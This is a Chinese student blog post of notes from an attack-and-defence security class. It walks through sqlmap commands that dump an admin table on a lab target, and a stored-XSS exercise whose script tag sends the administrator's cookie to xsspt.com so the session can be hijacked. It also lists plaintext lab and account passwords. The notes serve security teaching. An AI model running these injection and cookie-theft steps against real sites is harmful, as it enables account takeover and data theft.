美文网首页
信息安全攻防课程笔记2018-11-27

信息安全攻防课程笔记2018-11-27

作者: 坚持的皮蛋 | 来源:发表于2018-11-28 11:46 被阅读0次

    老师的攻防网站:http://192.168.43.16/Type/?SortID=2
    需连接老师的Wifi:TRT-TLIO

    python2.7版本与3版本并存
    创建虚拟环境
    1、创建当前版本虚拟环境:mkvirtualenv bobbyvir
    2、创建指定版本虚拟环境:mkvirtualenv --python=c:\python27\python.exe py2.7work
    3、进入虚拟环境:workon py2.7work
    4、退出虚拟环境:deactivate
    5、删除虚拟环境:rmvirtualenv py2.7work

    SQLmap:针对SQL没有做防注入攻击的情况。

    http://testasp.vulnweb.com/有弱密码

    攻防测试一(SQLMAP)

    靶机:http://192.168.43.16/Type/?SortID=2
    使用工具:sqlmap
    按手册操作,最终获取admin账号的密码。
    1.检查出是Microsoft Access数据库
    (py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent
    2.获取表名
    (py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent --tables
    3.获取列名
    (py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --columns
    4.获取数据
    (py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --dump

    攻防测试二(SQLMAP后提权)

    攻防测试三(XSS实验):

    靶机:192.168.43.235
    管理员:admin,psw:bendss
    利用www.xsspt.com网站的cookie获取功能

    xsspt账号:snowd2002,psw:xxxnnnn2013cy

    xsspt使用说明:1)创建项目;2)选默认模块;3)下一步,讲提示如何插入具体的代码。
    如:
    <script src=http://xsspt.com/1sIScz?1543373368></script>

    具体实验步骤:

    1.找出管理员网址:

    用WVS软件,扫描靶机,获取靶机的目录结构

    step1.png

    发现目录为admin,入口为admin_login.asp

    2.在靶机中植入木马:

    靶机中有留言板,进行留言,并插入木马代码。


    step2.png

    3.利用www.xsspt.com网站的cookie获取功能

    登陆xsspt网站,当靶机管理员在后台访问过留言数据后,木马代码将会把管理员cookie发送到xsspt网站,进入xsspt网站点击刚建立的项目名称可以看到具体的cookie,有可能有多个cookie数值。


    step3.png

    cookie中的名称为:ASPSESSIONIDASTTTTRB,数值=IPFJHGPCEMCLKOLIIKEDJGOA

    4.使用cookie访问靶机:

    使用chrome或firefox的web developer插件,输入刚才的cookie

    step4.png

    完成后用chrome或firefox访问靶机192.168.43.235/admin,将会看到能进入管理员界面。

    完成!!!

    相关文章

      网友评论

          本文标题:信息安全攻防课程笔记2018-11-27

          本文链接:https://www.haomeiwen.com/subject/lvuwqqtx.html